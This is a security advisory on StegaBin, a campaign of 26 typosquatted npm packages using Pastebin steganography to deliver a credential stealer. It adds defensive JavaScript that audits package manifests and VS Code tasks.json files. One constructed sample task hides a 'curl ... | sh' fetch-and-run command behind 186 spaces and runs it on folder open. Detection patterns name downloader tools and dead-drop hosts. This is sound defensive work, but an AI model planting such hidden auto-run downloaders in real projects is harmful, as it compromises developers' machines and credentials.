StegaBin: 26 Malicious npm Packages Use Pastebin Steganography to Deploy Credential Stealer
Summary:
The StegaBin campaign is a sophisticated software supply chain attack involving 26 malicious npm packages that deploy a multistage credential and secret harvesting operation targeting developers. The campaign is attributed to the North Korea-sponsored threat actor FAMOUS CHOLLIMA, which is closely associated with the Lazarus Group and the ongoing Contagious Interview campaigns. Attackers utilized typosquatting to deceive developers into downloading malicious packages, which subsequently resolved command and control infrastructure hidden within innocuous Pastebin essays via character-level steganography. Once installed, the malware automatically deploys a comprehensive nine-module infostealer and Remote Access Trojan toolkit tailored to developer environments. This campaign underscores a strategic focus on compromising developer workstations, allowing threat actors to achieve persistent access and exfiltrate sensitive source code, local credentials, and SSH keys. The breadth of typosquat targets suggests the campaign was not aimed at a specific technology stack but rather cast a wide net.
- February 25 and 26, 2026: 26 malicious npm packages were published under individual throwaway accounts.
- February 26, 2026: Independent researcher Kieran Miyamoto disclosed 17 related packages.
- February 27, 2026: Socket threat researchers confirmed the campaign and detailed the live payload delivery.
The attackers relied heavily on typosquatting widely used npm libraries such as express, fastify, and lodash. To increase credibility, eight of the 26 packages used a "-lint" suffix to masquerade as standard developer tooling. Crucially, the malicious packages also declared the legitimate packages they were typosquatting as dependencies. This tactic allowed the victim's application to compile and run normally, delaying discovery while the infection chain executed silently in the background. The campaign also included a decoy dependency for Hardhat, an Ethereum smart contract framework, indicating a target profile of blockchain and Web3 developers.
The StegaBin infection chain begins with an npm install hook. The malicious packages declare an install script that runs automatically upon installation, utilizing decoy functions for camouflage. This script dynamically requires a heavily obfuscated payload located at a path designed to blend in as a vendored copy of a legitimate cryptographic library. This file acts as a sophisticated text steganography decoder. The decoder relies on three hardcoded Pastebin URLs that serve as a fallback chain. These URLs contain seemingly benign computer science essays. The malware strips zero-width Unicode characters, reads a length marker, calculates evenly spaced positions throughout the text, and extracts the hidden characters to reveal C2 domains. These decoded domains point to a resilient network of 31 distinct Vercel deployments used to host platform-specific shell payloads for macOS, Linux, and Windows.
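The two manifest-level tells described above, a lifecycle install hook and a name that rides on a popular package while declaring that package as a dependency, can be checked mechanically before a dependency is trusted. The following is an added example, not code from Socket's post or from the campaign; the protected-name list, the suffix list, the one-edit distance threshold and the sample manifest are all constructed assumptions for illustration.

```javascript
// Names to protect: a constructed sample list for this example, not a canonical set.
const POPULAR = ["express", "fastify", "lodash", "kafkajs", "hardhat"];
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];
// Levenshtein distance, to catch one-character typos of a protected name.
function editDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, (_, i) => [i]);
  for (let j = 1; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++)
    for (let j = 1; j <= b.length; j++)
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1,
                         d[i - 1][j - 1] + (a[i - 1] === b[j - 1] ? 0 : 1));
  return d[a.length][b.length];
}
// Returns the protected package a name appears to ride on, or null. Tries the
// name as published, with a tooling suffix removed ("fastify-lint") and with a
// trailing "js" removed as well ("expressjs-lint" -> "express").
function impersonates(name, popular = POPULAR) {
  if (popular.includes(name)) return null;         // the genuine package itself
  const noSuffix = name.replace(/-(lint|utils|core|cli)$/, "");
  const candidates = [name, noSuffix, noSuffix.replace(/-?js$/, "")];
  for (const c of candidates)
    for (const p of popular)
      if (c === p || editDistance(c, p) <= 1) return p;
  return null;
}
// pkg is a parsed package.json. Flags lifecycle install hooks and impersonating
// names, escalating when the impersonated package is also declared as a
// dependency: the proxy pattern that keeps the victim's app working.
function auditPackage(pkg, popular = POPULAR) {
  const findings = [];
  const scripts = pkg.scripts || {};
  for (const hook of INSTALL_HOOKS)
    if (scripts[hook]) findings.push(`lifecycle hook "${hook}": ${scripts[hook]}`);
  const target = impersonates(pkg.name || "", popular);
  if (target) {
    const deps = { ...(pkg.dependencies || {}), ...(pkg.optionalDependencies || {}) };
    findings.push(deps[target]
      ? `proxy typosquat: "${pkg.name}" impersonates "${target}" and depends on it`
      : `possible typosquat: "${pkg.name}" resembles "${target}"`);
  }
  return findings;
}
// Constructed manifest modelled on the pattern described above, not a real package.
const SAMPLE_PKG = {
  name: "fastify-lint",
  scripts: { install: "node ./vendor/crypto-lib/index.js" },
  dependencies: { fastify: "^4.0.0" },
};
console.log(auditPackage(SAMPLE_PKG).join("\n"));
```

Run it over every package.json under node_modules (or over the lockfile's resolved names) and treat a "proxy typosquat" plus an install hook as a stop-the-build finding rather than a warning.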
Once the payload is retrieved, a token-gated bootstrapper takes over. The shell script accesses a Vercel domain using a single-use token and HTTP redirects, actively preventing automated security scanners from replicating the request. The bootstrapper ensures Node.js and Python are present on the host, downloads the primary RAT payload, installs dependencies, executes the RAT in the background, and then deletes itself to remove forensic artifacts. The RAT then connects to a dedicated C2 server on a specific port and awaits further instructions. Upon connection, the C2 server automatically deploys a massive nine-module infostealer toolkit designed to completely compromise the developer's workstation. For persistence, the malware modifies tasks.json to auto-run on folder open, utilizing 186 spaces to push the payload off-screen and silently reinfect the host with every session.
Suggested Corrections:
A full list of IOCs is available in Socket’s blog post.
- Immediately blacklist the primary command and control IP address 103[.]106[.]67[.]63 on port 1244.
- Block network access to the 31 Vercel domains identified in the campaign (such as ext-checkdin[.]vercel[.]app) and the specific Pastebin URLs used as steganographic dead-drop resolvers.
- Scan all developer environments, node_modules directories, and CI/CD pipelines for the 26 specific typosquatted npm packages, paying special attention to packages with a "-lint" suffix like fastify-lint, expressjs-lint, and kafkajs-lint.
- Inspect developer workstations for modified tasks.json files within VSCode configuration directories. Specifically look for shell commands obfuscated by 186 spaces that attempt to curl or wget payloads from Vercel domains on folder open.
- Configure network monitoring tools to alert on HTTP POST requests targeting URI paths like /clipup and /uploads, which the malware uses to exfiltrate clipboard data and stolen secrets every 10 minutes.
- Verify Package Names: Train developers to rigorously verify npm package names before installation to avoid falling victim to typosquatting, especially since these malicious packages proxy legitimate libraries to delay discovery.
- Scrutinize Install Scripts: Implement policies to review or restrict packages that automatically execute scripts upon installation, as this campaign relies on an install script triggering a hidden payload.
- Deploy Automated Threat Detection: Utilize automated security tools capable of flagging malicious install-script behavior, obfuscated payload delivery, and anomalous vendored files.
- Monitor for Obfuscation Techniques: Implement code scanning rules to detect suspicious code patterns in project dependencies, such as RC4 string encryption, array rotation, self-defending anti-debug mechanisms, and control flow flattening.
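The tasks.json persistence described in the summary and in the inspection step above can be triaged with a small checker that reads the file the way VS Code does (tasks.json allows comments) and looks for the coinciding tells. The following is an added example, not code from Socket's post; the `runOptions.runOn: "folderOpen"` key is VS Code's real auto-run setting, while the sample file, its host name and path, and the 20-space padding threshold are constructed assumptions.

```javascript
const ZERO_WIDTH = /[\u200B-\u200D\u2060\uFEFF]/;
const DOWNLOADER = /\b(curl|wget|Invoke-WebRequest|iwr)\b/i;
const DEAD_DROP = /(vercel\.app|pastebin\.com)/i;   // hosting named in the report
// tasks.json is JSONC. Strip // and /* */ comments without touching string
// contents, so the "//" inside an https:// URL in a command survives.
function stripJsonc(text) {
  let out = "", i = 0, inStr = false;
  while (i < text.length) {
    const c = text[i], n = text[i + 1];
    if (inStr) {                       // copy strings verbatim, honouring escapes
      out += c; i++;
      if (c === "\\" && n !== undefined) { out += n; i++; } else if (c === '"') inStr = false;
    } else if (c === '"') { inStr = true; out += c; i++; }
    else if (c === "/" && n === "/") { while (i < text.length && text[i] !== "\n") i++; }
    else if (c === "/" && n === "*") { const e = text.indexOf("*/", i + 2); i = e < 0 ? text.length : e + 2; }
    else { out += c; i++; }
  }
  return out;
}
// Returns one finding per suspicious task. A lone folderOpen task is normal, so a
// task is reported only when at least two of the tells below coincide.
function auditTasksJson(text) {
  const findings = [];
  for (const task of JSON.parse(stripJsonc(text)).tasks || []) {
    const cmd = [task.command, ...(task.args || [])].filter(Boolean).join(" ");
    const reasons = [];
    if (task.runOptions && task.runOptions.runOn === "folderOpen") reasons.push("runs on folderOpen");
    const gap = (cmd.match(/ {20,}/) || [""])[0].length;   // 20 is an assumed threshold
    if (gap) reasons.push(`${gap}-space padding hides the tail of the command`);
    if (ZERO_WIDTH.test(cmd)) reasons.push("zero-width characters in command");
    if (DOWNLOADER.test(cmd)) reasons.push("downloader in command");
    if (DEAD_DROP.test(cmd)) reasons.push("fetches from a dead-drop host");
    if (reasons.length >= 2) findings.push({ label: task.label, reasons });
  }
  return findings;
}
// Constructed sample: one benign task plus one mimicking the described persistence.
// The host and path are placeholders, not indicators from the report.
const SAMPLE_TASKS = `{
  // JSONC comment, as VS Code allows
  "version": "2.0.0",
  "tasks": [
    { "label": "build", "type": "shell", "command": "npm run build" },
    { "label": "prepare", "type": "shell", "runOptions": { "runOn": "folderOpen" },
      "command": "echo ok${" ".repeat(186)}curl -fsSL https://EXAMPLE-HOST.vercel.app/PLACEHOLDER | sh" }
  ]
}`;
console.log(JSON.stringify(auditTasksJson(SAMPLE_TASKS), null, 2));
```

Point it at every `.vscode/tasks.json` in checked-out repositories and in user profile directories; a hit on the padding tell alone is worth a manual look even when the task is not configured to run on folder open.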
https://socket.dev/blog/stegabin-26-malicious-npm-packages-use-pastebin-steganography